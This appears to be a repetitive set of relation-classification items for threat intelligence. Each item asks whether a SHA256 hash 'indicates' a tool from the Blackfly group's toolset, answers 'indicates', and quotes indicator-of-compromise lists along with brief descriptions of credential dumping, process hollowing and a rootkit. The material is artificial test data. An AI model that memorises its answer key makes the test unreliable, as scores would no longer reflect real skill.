5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f – Proxy configuration tool
d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee – Proxy configuration tool
f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f – Proxy configuration tool
88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4 – Proxy configuration tool
498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1 – Proxy configuration tool
100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c – Credential-dumping tool
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d
### Target Entity: SQL tool
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Indicators of Compromise
If an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.
cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a – Backdoor.Winnkit
e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596 – Backdoor.Winnkit
a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac – Backdoor.Winnkit
714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196 – Backdoor.Winnkit
192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284 – Backdoor.Winnkit
caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459 – Backdoor.Winnkit
452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4 – Screenshotting tool
1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e – Process-hollowing tool
4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d – SQL tool
560ea79a96dc4f459e96df379b00b59828639b02bd7a7a9964b06d04cb43a35a – DCSync
b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c – Mimikatz
a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864 – ForkPlayground
5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f – Proxy configuration tool
d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee – Proxy configuration tool
f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f – Proxy configuration tool
88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4 – Proxy configuration tool
498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1 – Proxy configuration tool
100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c – Credential-dumping tool
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e
### Target Entity: Process-hollowing tool
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Indicators of Compromise
If an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.
cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a – Backdoor.Winnkit
e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596 – Backdoor.Winnkit
a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac – Backdoor.Winnkit
714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196 – Backdoor.Winnkit
192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284 – Backdoor.Winnkit
caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459 – Backdoor.Winnkit
452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4 – Screenshotting tool
1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e – Process-hollowing tool
4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d – SQL tool
560ea79a96dc4f459e96df379b00b59828639b02bd7a7a9964b06d04cb43a35a – DCSync
b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c – Mimikatz
a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864 – ForkPlayground
5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f – Proxy configuration tool
d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee – Proxy configuration tool
f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f – Proxy configuration tool
88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4 – Proxy configuration tool
498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1 – Proxy configuration tool
100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c – Credential-dumping tool
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4
### Target Entity: Screenshotting tool
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Indicators of Compromise
If an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.
cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a – Backdoor.Winnkit
e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596 – Backdoor.Winnkit
a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac – Backdoor.Winnkit
714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196 – Backdoor.Winnkit
192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284 – Backdoor.Winnkit
caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459 – Backdoor.Winnkit
452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4 – Screenshotting tool
1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e – Process-hollowing tool
4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d – SQL tool
560ea79a96dc4f459e96df379b00b59828639b02bd7a7a9964b06d04cb43a35a – DCSync
b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c – Mimikatz
a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864 – ForkPlayground
5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f – Proxy configuration tool
d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee – Proxy configuration tool
f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f – Proxy configuration tool
88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4 – Proxy configuration tool
498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1 – Proxy configuration tool
100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c – Credential-dumping tool
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284
### Target Entity: Winnkit
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Indicators of Compromise
If an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.
cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a – Backdoor.Winnkit
e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596 – Backdoor.Winnkit
a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac – Backdoor.Winnkit
714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196 – Backdoor.Winnkit
192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284 – Backdoor.Winnkit
caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459 – Backdoor.Winnkit
452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4 – Screenshotting tool
1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e – Process-hollowing tool
4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d – SQL tool
560ea79a96dc4f459e96df379b00b59828639b02bd7a7a9964b06d04cb43a35a – DCSync
b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c – Mimikatz
a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864 – ForkPlayground
5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f – Proxy configuration tool
d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee – Proxy configuration tool
f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f – Proxy configuration tool
88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4 – Proxy configuration tool
498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1 – Proxy configuration tool
100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c – Credential-dumping tool
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac
### Target Entity: Winnkit
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Indicators of Compromise
If an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.
cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a – Backdoor.Winnkit
e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596 – Backdoor.Winnkit
a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac – Backdoor.Winnkit
714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196 – Backdoor.Winnkit
192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284 – Backdoor.Winnkit
caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459 – Backdoor.Winnkit
452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4 – Screenshotting tool
1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e – Process-hollowing tool
4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d – SQL tool
560ea79a96dc4f459e96df379b00b59828639b02bd7a7a9964b06d04cb43a35a – DCSync
b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c – Mimikatz
a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864 – ForkPlayground
5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f – Proxy configuration tool
d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee – Proxy configuration tool
f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f – Proxy configuration tool
88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4 – Proxy configuration tool
498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1 – Proxy configuration tool
100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c – Credential-dumping tool
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4
### Target Entity: Proxy configuration tool
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Indicators of Compromise
If an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.
cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a – Backdoor.Winnkit
e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596 – Backdoor.Winnkit
a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac – Backdoor.Winnkit
714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196 – Backdoor.Winnkit
192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284 – Backdoor.Winnkit
caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459 – Backdoor.Winnkit
452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4 – Screenshotting tool
1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e – Process-hollowing tool
4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d – SQL tool
560ea79a96dc4f459e96df379b00b59828639b02bd7a7a9964b06d04cb43a35a – DCSync
b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c – Mimikatz
a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864 – ForkPlayground
5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f – Proxy configuration tool
d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee – Proxy configuration tool
f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f – Proxy configuration tool
88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4 – Proxy configuration tool
498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1 – Proxy configuration tool
100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c – Credential-dumping tool
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196
### Target Entity: Winnkit
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Indicators of Compromise
If an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.
cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a – Backdoor.Winnkit
e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596 – Backdoor.Winnkit
a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac – Backdoor.Winnkit
714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196 – Backdoor.Winnkit
192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284 – Backdoor.Winnkit
caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459 – Backdoor.Winnkit
452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4 – Screenshotting tool
1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e – Process-hollowing tool
4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d – SQL tool
560ea79a96dc4f459e96df379b00b59828639b02bd7a7a9964b06d04cb43a35a – DCSync
b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c – Mimikatz
a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864 – ForkPlayground
5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f – Proxy configuration tool
d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee – Proxy configuration tool
f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f – Proxy configuration tool
88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4 – Proxy configuration tool
498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1 – Proxy configuration tool
100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c – Credential-dumping tool
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c
### Target Entity: Mimikatz
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Indicators of Compromise
If an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.
cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a – Backdoor.Winnkit
e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596 – Backdoor.Winnkit
a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac – Backdoor.Winnkit
714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196 – Backdoor.Winnkit
192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284 – Backdoor.Winnkit
caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459 – Backdoor.Winnkit
452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4 – Screenshotting tool
1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e – Process-hollowing tool
4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d – SQL tool
560ea79a96dc4f459e96df379b00b59828639b02bd7a7a9964b06d04cb43a35a – DCSync
b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c – Mimikatz
a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864 – ForkPlayground
5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f – Proxy configuration tool
d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee – Proxy configuration tool
f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f – Proxy configuration tool
88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4 – Proxy configuration tool
498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1 – Proxy configuration tool
100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c – Credential-dumping tool
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596
### Target Entity: Winnkit
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Indicators of Compromise
If an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.
cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a – Backdoor.Winnkit
e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596 – Backdoor.Winnkit
a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac – Backdoor.Winnkit
714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196 – Backdoor.Winnkit
192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284 – Backdoor.Winnkit
caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459 – Backdoor.Winnkit
452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4 – Screenshotting tool
1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e – Process-hollowing tool
4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d – SQL tool
560ea79a96dc4f459e96df379b00b59828639b02bd7a7a9964b06d04cb43a35a – DCSync
b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c – Mimikatz
a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864 – ForkPlayground
5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f – Proxy configuration tool
d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee – Proxy configuration tool
f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f – Proxy configuration tool
88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4 – Proxy configuration tool
498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1 – Proxy configuration tool
100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c – Credential-dumping tool
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee
### Target Entity: Proxy configuration tool
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Indicators of Compromise
If an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.
cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a – Backdoor.Winnkit
e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596 – Backdoor.Winnkit
a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac – Backdoor.Winnkit
714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196 – Backdoor.Winnkit
192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284 – Backdoor.Winnkit
caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459 – Backdoor.Winnkit
452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4 – Screenshotting tool
1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e – Process-hollowing tool
4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d – SQL tool
560ea79a96dc4f459e96df379b00b59828639b02bd7a7a9964b06d04cb43a35a – DCSync
b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c – Mimikatz
a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864 – ForkPlayground
5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f – Proxy configuration tool
d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee – Proxy configuration tool
f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f – Proxy configuration tool
88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4 – Proxy configuration tool
498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1 – Proxy configuration tool
100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c – Credential-dumping tool
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f
### Target Entity: Proxy configuration tool
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Current Blackfly toolset
The following tools were used in attacks during late 2022 and early 2023:
* **Backdoor.Winnkit**
SHA256: caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459
SHA256: cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a
SHA256: e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596
SHA256: a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac
SHA256: 714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196
SHA256: 192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284
Rootkit driver known to be associated with Blackfly
* **Credential-dumping tool**
SHA256: 100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c
Creates a dump of credentials from lsass.exe in C:\windows\temp\1.bin.
* **Screenshotting tool**
SHA256: 452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4
Screenshots all open windows and saves them as .jpg files.
* **Process-hollowing tool**
SHA256: 1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e
Injects shellcode in C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted. The shellcode is a simple "Hello World" alert message.
* **SQL tool**
SHA256: 4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d
SQL client tool used to query SQL databases.
* **Mimikatz**
SHA256: b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c
Publicly available credential-dumping tool.
* **ForkPlayground**
SHA256: a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864
Proof-of-Concept application to create a memory dump of an arbitrary process using the ForkLib.
* **Proxy configuration tool**
SHA256: 5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f
SHA256: d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee
SHA256: f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f
Configures proxy settings by injecting into: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted.
* **Proxy configuration tool**
SHA256: 88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4
SHA256: 498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1
This tool requires a file called conf.dat to run properly, located at: c:\users\public\conf.dat. Conf.dat contains the configuration to set up proxy settings.
|
<label>indicates</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a
### Target Entity: Winnkit
### Possible Relationship Labels:
['indicates', 'is not related to', 'not sure']
### Text Passage:
Current Blackfly toolset
The following tools were used in attacks during late 2022 and early 2023:
* **Backdoor.Winnkit**
SHA256: caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459
SHA256: cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a
SHA256: e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596
SHA256: a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac
SHA256: 714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196
SHA256: 192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284
Rootkit driver known to be associated with Blackfly
* **Credential-dumping tool**
SHA256: 100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c
Creates a dump of credentials from lsass.exe in C:\windows\temp\1.bin.
* **Screenshotting tool**
SHA256: 452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4
Screenshots all open windows and saves them as .jpg files.
* **Process-hollowing tool**
SHA256: 1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e
Injects shellcode in C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted. The shellcode is a simple "Hello World" alert message.
* **SQL tool**
SHA256: 4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d
